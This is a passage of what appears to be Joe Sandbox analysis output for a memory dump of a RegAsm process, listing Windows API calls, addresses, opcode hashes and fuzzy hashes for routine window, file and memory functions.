                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                • String ID:
                                                                • API String ID: 2678498856-0
                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Item
                                                                • String ID:
                                                                • API String ID: 3888421826-0
                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                APIs
                                                                • memset.MSVCRT ref: 00417B7B
                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                • String ID:
                                                                • API String ID: 3727323765-0
                                                                • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                • malloc.MSVCRT ref: 00417407
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                • String ID:
                                                                • API String ID: 4284152360-0
                                                                • Opcode ID: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                • Opcode Fuzzy Hash: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                APIs
                                                                • memset.MSVCRT ref: 0040F673
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                • String ID:
                                                                • API String ID: 2754987064-0
                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                APIs
                                                                • memset.MSVCRT ref: 0040F6E2
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                • strlen.MSVCRT ref: 0040F70D
                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                • String ID:
                                                                • API String ID: 2754987064-0
                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$CloseHandle
                                                                • String ID: General
                                                                • API String ID: 3722638380-26480598
                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                APIs
                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                • String ID:
                                                                • API String ID: 764393265-0
                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Time$System$File$LocalSpecific
                                                                • String ID:
                                                                • API String ID: 979780441-0
                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                APIs
                                                                • memcpy.MSVCRT ref: 004134E0
                                                                • memcpy.MSVCRT ref: 004134F2
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                • String ID:
                                                                • API String ID: 1386444988-0
                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                APIs
                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcschr$memcpywcslen
                                                                • String ID: "
                                                                • API String ID: 1983396471-123907689
                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfmemcpy
                                                                • String ID: %2.2X
                                                                • API String ID: 2789212964-323797159
                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintf
                                                                • String ID: %%-%d.%ds
                                                                • API String ID: 3988819677-2008345750
                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                APIs
                                                                • memset.MSVCRT ref: 0040E770
                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: MessageSendmemset
                                                                • String ID: F^@
                                                                • API String ID: 568519121-3652327722
                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PlacementWindowmemset
                                                                • String ID: WinPos
                                                                • API String ID: 4036792311-2823255486
                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@DeleteObject
                                                                • String ID: r!A
                                                                • API String ID: 1103273653-628097481
                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID:
                                                                • API String ID: 438689982-0
                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$memset
                                                                • String ID:
                                                                • API String ID: 1860491036-0
                                                                • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                APIs
                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                • memcpy.MSVCRT ref: 00408B79
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcmp$memcpy
                                                                • String ID:
                                                                • API String ID: 231171946-0
                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID:
                                                                • API String ID: 1033339047-0
                                                                • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49